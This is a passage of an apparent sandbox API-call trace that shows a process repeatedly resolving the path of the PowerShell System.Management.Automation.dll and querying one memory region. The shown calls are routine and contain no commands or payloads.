lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.582] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.583] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.584] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] VirtualQuery (in: lpAddress=0xcbc10, lpBuffer=0xccad0, dwLength=0x30 | out: lpBuffer=0xccad0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.586] VirtualQuery (in: lpAddress=0xcbc10, lpBuffer=0xccad0, dwLength=0x30 | out: lpBuffer=0xccad0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.588] VirtualQuery (in: lpAddress=0xcbc10, lpBuffer=0xccad0, dwLength=0x30 | out: lpBuffer=0xccad0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.588] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] VirtualQuery (in: lpAddress=0xcbc10, lpBuffer=0xccad0, dwLength=0x30 | out: lpBuffer=0xccad0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.589] VirtualQuery (in: lpAddress=0xcb300, lpBuffer=0xcc1c0, dwLength=0x30 | out: lpBuffer=0xcc1c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.589] VirtualQuery (in: lpAddress=0xcb390, lpBuffer=0xcc250, dwLength=0x30 | out: lpBuffer=0xcc250*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.590] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.590] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.590] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: 
lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.590] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.591] VirtualQuery (in: 